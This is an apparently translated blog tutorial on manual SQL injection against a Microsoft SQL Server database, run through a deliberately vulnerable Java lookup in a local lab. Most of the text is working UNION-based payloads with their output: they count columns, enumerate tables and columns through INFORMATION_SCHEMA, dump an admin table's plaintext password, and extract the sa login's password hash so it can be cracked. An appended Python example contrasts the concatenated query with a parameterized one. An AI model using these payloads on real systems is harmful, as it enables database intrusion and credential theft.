Continuing from the previous post, "MySQL Manual Injection".
References: http://hi.baidu.com/ciqing_s/item/971bf994365130accc80e5ed
http://hi.baidu.com/moon4ins/item/ed3b181ae472cce139cb30c4
Prerequisite knowledge:
MSSQL comment markers: // or --
That is, anything that follows either of these two markers is ignored.
Environment:
The code is the same as in the previous post:
    import java.sql.SQLException;

    public class TestSql {
        public static void main(String[] args) throws InstantiationException,
                IllegalAccessException, ClassNotFoundException, SQLException {
            // DateExecute is the JDBC helper class from the previous post
            DateExecute de = new DateExecute("MSSQL", "sa", "xxxxxxx", "school");
            String name = "mynona";
            String address = "gdut";
            // injected value: closes the string literal, appends a UNION SELECT and comments out the rest
            name = "mynona' and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--";
            // vulnerable: the input is concatenated straight into the SQL text
            String sql = "select * from student where name = '" + name + "' and address = '" + address + "'";
            //sql = "select name, password_hash from sys.sql_logins";
            System.out.println("执行sql:");
            System.out.println(sql);
            System.out.println("输出结果:");
            System.out.println(de.getDateList(sql));
        }
    }
Database:
Target:
Looking at the system views, they turn out to be very similar to MySQL's.
We can see that INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS are available.
So we can reuse the MySQL manual injection technique as-is.
Scrolling further down in the view above:
Our target is the name and password columns of the table shown above.
Determine the number of columns in the current SELECT:
name = "mynona' order by 1--";  ok
name = "mynona' order by 2--";  ok
name = "mynona' order by 3--";  ok
name = "mynona' order by 4--";  error
So the current SELECT statement has 3 columns.
Dump the database name:
name = "mynona' and 1=2 union select 1,db_name(),3--";
Executed SQL:
select * from student where name = 'mynona' and 1=2 union select 1,db_name(),3--' and address = 'gdut'
Output:
[{id=1, address=3, name=school}]
So the database name is school.
Enumerate the tables in the current database:
name = "mynona' and 1=2 union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES--";
Executed SQL:
select * from student where name = 'mynona' and 1=2 union select 1,2,TABLE_NAME from INFORMATION_SCHEMA.TABLES--' and address = 'gdut'
Output:
[{id=1, address=admin, name=2}, {id=1, address=student, name=2}, {id=1, address=sysdiagrams, name=2}]
So the tables are: admin, student, sysdiagrams
Enumerate the columns of the admin table:
name = "mynona' and 1=2 union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'admin'--";
Executed SQL:
select * from student where name = 'mynona' and 1=2 union select 1,2,COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'admin'--' and address = 'gdut'
Output:
[{id=1, address=id, name=2}, {id=1, address=name, name=2}, {id=1, address=password, name=2}]
So the columns of table admin are: id, name, password
Dump the rows of the admin table:
name = "mynona' union select id, name, password from admin--";
Executed SQL:
select * from student where name = 'mynona' union select id, name, password from admin--' and address = 'gdut'
Output:
[{id=1, address=mynona, name=admin}, {id=1, address=gdut, name=mynona}]
That is: id=1, address=mynona, name=admin (the admin table's password column lands in the address field, so the admin user's password is mynona)
Enumerate the sys.sql_logins table:
name = "mynona' and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--";
Executed SQL:
select * from student where name = 'mynona' and 1=2 union select 1,name,master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins--' and address = 'gdut'
Output:
[{id=1, address=0x010056049b0eb602873b079baee778daa3ecc4fdba7447797d6a, name=sa}, {id=1, address=0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f, name=##MS_PolicyEventProcessingLogin##}, {id=1, address=0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f, name=##MS_PolicyTsqlExecutionLogin##}]
This gives: the password_hash of user sa is 0x010056049b0eb602873b079baee778daa3ecc4fdba7447797d6a
Cracking this hash yields sa's password.
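Every step above works only because TestSql concatenates the name into the SQL text. As an added example (not part of the original post or its test project), the following Python stand-in uses an in-memory SQLite database instead of MSSQL (UNION, ORDER BY n and -- comments behave the same; the constructed schema mirrors the page's student and admin tables) to show that the same "order by" probe and admin dump succeed against the concatenated query but fail against a parameterized one.

```python
import sqlite3

# Constructed in-memory stand-in for the page's "school" database
# (SQLite instead of MSSQL; UNION, ORDER BY n and -- comments behave the same).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE student (id INTEGER, name TEXT, address TEXT);
        CREATE TABLE admin   (id INTEGER, name TEXT, password TEXT);
        INSERT INTO student VALUES (1, 'mynona', 'gdut');
        INSERT INTO admin   VALUES (1, 'admin',  'mynona');
    """)
    return conn

def lookup_concat(conn, name, address):
    """Vulnerable: the same string concatenation as the page's Java code."""
    sql = ("select * from student where name = '" + name
           + "' and address = '" + address + "'")
    return conn.execute(sql).fetchall()

def lookup_param(conn, name, address):
    """Hardened: placeholders; the values are bound by the driver, never spliced
    into the SQL text, so quotes, UNION and -- inside them stay plain data."""
    sql = "select * from student where name = ? and address = ?"
    return conn.execute(sql, (name, address)).fetchall()

def count_columns(lookup, conn, limit=10):
    """The page's 'order by n' probe: the first n that raises an error reveals
    the column count (n - 1). Returns None if no probe ever errors, which is
    what happens with the parameterized lookup."""
    for n in range(1, limit + 1):
        try:
            lookup(conn, f"mynona' order by {n}--", "gdut")
        except sqlite3.OperationalError:
            return n - 1
    return None

# The page's admin-dump payload, used as the "name" input in both lookups.
PAYLOAD = "mynona' union select id, name, password from admin--"

def demo():
    conn = build_db()
    return {
        "concat_columns": count_columns(lookup_concat, conn),  # 3
        "param_columns": count_columns(lookup_param, conn),    # None
        "concat_rows": lookup_concat(conn, PAYLOAD, "gdut"),   # student row + admin row
        "param_rows": lookup_param(conn, PAYLOAD, "gdut"),     # [] (no student has that name)
    }
```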
Download link for the source files and test project of this post and the previous one:
http://download.csdn.net/detail/mmyzlinyingjie/7095041